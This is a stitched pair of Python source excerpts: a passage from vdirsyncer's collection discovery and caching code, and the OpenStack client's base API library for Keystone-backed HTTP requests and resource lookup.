if rv:
raise exceptions.UserError("Detected change in config file, "
"please run `vdirsyncer discover {}`."
.format(pair.name))
raise exceptions.UserError("Please run `vdirsyncer discover {}` "
" before synchronization."
.format(pair.name))
logger.info("Discovering collections for pair {}".format(pair.name))
a_discovered = _DiscoverResult(pair.config_a, connector=connector)
b_discovered = _DiscoverResult(pair.config_b, connector=connector)
if list_collections:
# TODO: We should gather data and THEN print, so it can be async.
await _print_collections(
pair.config_a["instance_name"],
a_discovered.get_self,
connector=connector,
)
await _print_collections(
pair.config_b["instance_name"],
b_discovered.get_self,
connector=connector,
)
# We have to use a list here because the special None/null value would get
# mangled to string (because JSON objects always have string keys).
rv = await aiostream.stream.list(
expand_collections(
shortcuts=pair.collections,
config_a=pair.config_a,
config_b=pair.config_b,
get_a_discovered=a_discovered.get_self,
get_b_discovered=b_discovered.get_self,
_handle_collection_not_found=handle_collection_not_found,
)
)
if "from b" in (pair.collections or []):
only_in_a = set((await a_discovered.get_self()).keys()) - set(
(await b_discovered.get_self()).keys())
if only_in_a and "delete" in pair.config_a["implicit"]:
for a in only_in_a:
try:
handle_collection_was_removed(pair.config_a, a)
save_status(status_path, pair.name, a, data_type="metadata")
save_status(status_path, pair.name, a, data_type="items")
except NotImplementedError as e:
cli_logger.error(e)
if "from a" in (pair.collections or []):
only_in_b = set((await b_discovered.get_self()).keys()) - set(
(await a_discovered.get_self()).keys())
if only_in_b and "delete" in pair.config_b["implicit"]:
for b in only_in_b:
try:
handle_collection_was_removed(pair.config_b, b)
save_status(status_path, pair.name, b, data_type="metadata")
save_status(status_path, pair.name, b, data_type="items")
except NotImplementedError as e:
cli_logger.error(e)
await _sanity_check_collections(rv, connector=connector)
save_status(
status_path,
pair.name,
data_type="collections",
data={
"collections": list(
_compress_collections_cache(rv, pair.config_a, pair.config_b)
),
"cache_key": cache_key,
},
)
return rv
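# Shape of the result (collection names here are illustrative): the resolved
# value looks like
#
#   [("contacts", (a_args, b_args)), ("calendar", (a_args, b_args)), ...]
#
# where each *_args is a full storage config dict, i.e. the pair-level config
# with the per-collection values merged in.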
async def _sanity_check_collections(collections, *, connector):
tasks = []
for _, (a_args, b_args) in collections:
tasks.append(storage_instance_from_config(a_args, connector=connector))
tasks.append(storage_instance_from_config(b_args, connector=connector))
await asyncio.gather(*tasks)
def _compress_collections_cache(collections, config_a, config_b):
def deduplicate(x, y):
rv = {}
for key, value in x.items():
if key not in y or y[key] != value:
rv[key] = value
return rv
for name, (a, b) in collections:
yield name, (deduplicate(a, config_a), deduplicate(b, config_b))
def _expand_collections_cache(collections, config_a, config_b):
for name, (a_delta, b_delta) in collections:
a = dict(config_a)
a.update(a_delta)
b = dict(config_b)
b.update(b_delta)
yield name, (a, b)
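# Example of the compress/expand round trip above, with a made-up filesystem
# storage config:
#
#   config_a = {"type": "filesystem", "path": "~/.calendars/", "fileext": ".ics"}
#   full_a = {**config_a, "collection": "work"}
#   # _compress_collections_cache stores only the delta: {"collection": "work"}
#   # _expand_collections_cache merges that delta back over config_a.
#
# Only keys that differ from the pair-level config end up in the status cache.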
class _DiscoverResult:
def __init__(self, config, *, connector):
self._cls, _ = storage_class_from_config(config)
if self._cls.__name__ in [
"CardDAVStorage",
"CalDAVStorage",
"GoogleCalendarStorage",
]:
assert connector is not None
config["connector"] = connector
self._config = config
self._discovered = None
async def get_self(self):
if self._discovered is None:
self._discovered = await self._discover()
return self._discovered
async def _discover(self):
try:
discovered = await aiostream.stream.list(self._cls.discover(**self._config))
except NotImplementedError:
return {}
except Exception:
return handle_storage_init_error(self._cls, self._config)
else:
storage_type = self._config["type"]
rv = {}
for args in discovered:
args["type"] = storage_type
rv[args["collection"]] = args
return rv
async def expand_collections(
shortcuts,
config_a,
config_b,
get_a_discovered,
get_b_discovered,
_handle_collection_not_found,
):
handled_collections = set()
if shortcuts is None:
shortcuts = [None]
for shortcut in shortcuts:
if shortcut == "from a":
collections = await get_a_discovered()
elif shortcut == "from b":
collections = await get_b_discovered()
else:
collections = [shortcut]
for collection in collections:
if isinstance(collection, list):
collection, collection_a, collection_b = collection
else:
collection_a = collection_b = collection
if collection in handled_collections:
continue
handled_collections.add(collection)
a_args = await _collection_from_discovered(
get_a_discovered,
collection_a,
config_a,
_handle_collection_not_found,
)
b_args = await _collection_from_discovered(
get_b_discovered,
collection_b,
config_b,
_handle_collection_not_found,
)
yield collection, (a_args, b_args)
async def _collection_from_discovered(
get_discovered, collection, config, _handle_collection_not_found
):
if collection is None:
args = dict(config)
args["collection"] = None
return args
try:
return (await get_discovered())[collection]
except KeyError:
return await _handle_collection_not_found(config, collection)
async def _print_collections(
instance_name: str,
get_discovered,
*,
connector: aiohttp.TCPConnector,
):
try:
discovered = await get_discovered()
except exceptions.UserError:
raise
except Exception:
# Unless discovery failed due to a user-inflicted error (instanceof
# UserError), we don't even know if the storage supports discovery
# properly. So we can't abort.
import traceback
logger.debug("".join(traceback.format_tb(sys.exc_info()[2])))
logger.warning(
"Failed to discover collections for {}, use `-vdebug` "
"to see the full traceback.".format(instance_name)
)
return
logger.info(f"{instance_name}:")
tasks = []
for args in discovered.values():
tasks.append(_print_single_collection(args, instance_name, connector))
await asyncio.gather(*tasks)
async def _print_single_collection(args, instance_name, connector):
collection = args["collection"]
if collection is None:
return
args["instance_name"] = instance_name
try:
storage = await storage_instance_from_config(
args,
create=False,
connector=connector,
)
displayname = await storage.get_meta("displayname")
except Exception:
displayname = ""
logger.info(
" - {}{}".format(
json.dumps(collection),
f' ("{displayname}")' if displayname and displayname != collection else "",
)
)
|
the-stack_106_23916 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Base API Library"""
import simplejson as json
from keystoneauth1 import exceptions as ks_exceptions
from keystoneauth1 import session as ks_session
from osc_lib import exceptions
from openstackclient.i18n import _
class KeystoneSession(object):
"""Wrapper for the Keystone Session
Restore some requests.session.Session compatibility;
keystoneauth1.session.Session.request() has the method and url
arguments swapped from the rest of the requests-using world.
"""
def __init__(
self,
session=None,
endpoint=None,
**kwargs
):
"""Base object that contains some common API objects and methods
:param Session session:
The default session to be used for making the HTTP API calls.
:param string endpoint:
The URL from the Service Catalog to be used as the base for API
requests on this API.
"""
super(KeystoneSession, self).__init__()
# a requests.Session-style interface
self.session = session
self.endpoint = endpoint
def _request(self, method, url, session=None, **kwargs):
"""Perform call into session
All API calls are funneled through this method to provide a common
place to finalize the passed URL and other things.
:param string method:
The HTTP method name, i.e. ``GET``, ``PUT``, etc
:param string url:
The API-specific portion of the URL path
:param Session session:
HTTP client session
:param kwargs:
keyword arguments passed to requests.request().
:return: the requests.Response object
"""
if not session:
session = self.session
if not session:
session = ks_session.Session()
if self.endpoint:
if url:
url = '/'.join([self.endpoint.rstrip('/'), url.lstrip('/')])
else:
url = self.endpoint.rstrip('/')
# Why is ksc session backwards???
return session.request(url, method, **kwargs)
class BaseAPI(KeystoneSession):
"""Base API"""
def __init__(
self,
session=None,
service_type=None,
endpoint=None,
**kwargs
):
"""Base object that contains some common API objects and methods
:param Session session:
The default session to be used for making the HTTP API calls.
:param string service_type:
API name, i.e. ``identity`` or ``compute``
:param string endpoint:
The URL from the Service Catalog to be used as the base for API
requests on this API.
"""
super(BaseAPI, self).__init__(session=session, endpoint=endpoint)
self.service_type = service_type
# The basic action methods all take a Session and return dict/lists
def create(
self,
url,
session=None,
method=None,
**params
):
"""Create a new resource
:param string url:
The API-specific portion of the URL path
:param Session session:
HTTP client session
:param string method:
HTTP method (default POST)
"""
if not method:
method = 'POST'
ret = self._request(method, url, session=session, **params)
# Should this move into _requests()?
try:
return ret.json()
except json.JSONDecodeError:
return ret
def delete(
self,
url,
session=None,
**params
):
"""Delete a resource
:param string url:
The API-specific portion of the URL path
:param Session session:
HTTP client session
"""
return self._request('DELETE', url, **params)
def list(
self,
path,
session=None,
body=None,
detailed=False,
**params
):
"""Return a list of resources
GET ${ENDPOINT}/${PATH}?${PARAMS}
path is often the object's plural resource type
:param string path:
The API-specific portion of the URL path
:param Session session:
HTTP client session
:param body: data that will be encoded as JSON and passed in POST
request (GET will be sent by default)
:param bool detailed:
Adds '/details' to path for some APIs to return extended attributes
:returns:
JSON-decoded response, could be a list or a dict-wrapped-list
"""
if detailed:
path = '/'.join([path.rstrip('/'), 'details'])
if body:
ret = self._request(
'POST',
path,
# service=self.service_type,
json=body,
params=params,
)
else:
ret = self._request(
'GET',
path,
# service=self.service_type,
params=params,
)
try:
return ret.json()
except json.JSONDecodeError:
return ret
# Layered actions built on top of the basic action methods do not
# explicitly take a Session but one may still be passed in kwargs
def find_attr(
self,
path,
value=None,
attr=None,
resource=None,
):
"""Find a resource via attribute or ID
Most APIs return a list wrapped by a dict with the resource
name as key. Some APIs (Identity) return a dict when a query
string is present and there is one return value. Take steps to
unwrap these bodies and return a single dict without any resource
wrappers.
:param string path:
The API-specific portion of the URL path
:param string value:
value to search for
:param string attr:
attribute to use for resource search
:param string resource:
plural of the object resource name; defaults to path
For example:
n = find(netclient, 'network', 'networks', 'matrix')
"""
# Default attr is 'name'
if attr is None:
attr = 'name'
# Default resource is path - in many APIs they are the same
if resource is None:
resource = path
def getlist(kw):
"""Do list call, unwrap resource dict if present"""
ret = self.list(path, **kw)
if isinstance(ret, dict) and resource in ret:
ret = ret[resource]
return ret
# Search by attribute
kwargs = {attr: value}
data = getlist(kwargs)
if isinstance(data, dict):
return data
if len(data) == 1:
return data[0]
if len(data) > 1:
msg = _("Multiple %(resource)s exist with %(attr)s='%(value)s'")
raise exceptions.CommandError(
msg % {'resource': resource,
'attr': attr,
'value': value}
)
# Search by id
kwargs = {'id': value}
data = getlist(kwargs)
if len(data) == 1:
return data[0]
msg = _("No %(resource)s with a %(attr)s or ID of '%(value)s' found")
raise exceptions.CommandError(
msg % {'resource': resource,
'attr': attr,
'value': value}
)
def find_bulk(
self,
path,
**kwargs
):
"""Bulk load and filter locally
:param string path:
The API-specific portion of the URL path
:param kwargs:
A dict of AVPs to match - logical AND
:returns: list of resource dicts
"""
items = self.list(path)
if isinstance(items, dict):
# strip off the enclosing dict
key = list(items.keys())[0]
items = items[key]
ret = []
for o in items:
try:
if all(o[attr] == kwargs[attr] for attr in kwargs.keys()):
ret.append(o)
except KeyError:
continue
return ret
def find_one(
self,
path,
**kwargs
):
"""Find a resource by name or ID
:param string path:
The API-specific portion of the URL path
:returns:
resource dict
"""
bulk_list = self.find_bulk(path, **kwargs)
num_bulk = len(bulk_list)
if num_bulk == 0:
msg = _("none found")
raise exceptions.NotFound(msg)
elif num_bulk > 1:
msg = _("many found")
raise RuntimeError(msg)
return bulk_list[0]
def find(
self,
path,
value=None,
attr=None,
):
"""Find a single resource by name or ID
:param string path:
The API-specific portion of the URL path
:param string value:
search expression
:param string attr:
name of attribute for secondary search
"""
try:
ret = self._request('GET', "/%s/%s" % (path, value)).json()
except ks_exceptions.NotFound:
kwargs = {attr: value}
try:
ret = self.find_one("/%s/detail" % (path), **kwargs)
except ks_exceptions.NotFound:
msg = _("%s not found") % value
raise exceptions.NotFound(msg)
return ret
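# Usage sketch (the session and endpoint values are placeholders, not taken
# from this module): a caller would typically construct the API with an
# authenticated keystoneauth1 session and a catalog endpoint, e.g.
#
#   api = BaseAPI(session=my_session,
#                 service_type="network",
#                 endpoint="https://network.example.com/v2.0")
#   nets = api.list("networks")
#   net = api.find("networks", "matrix", attr="name")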
|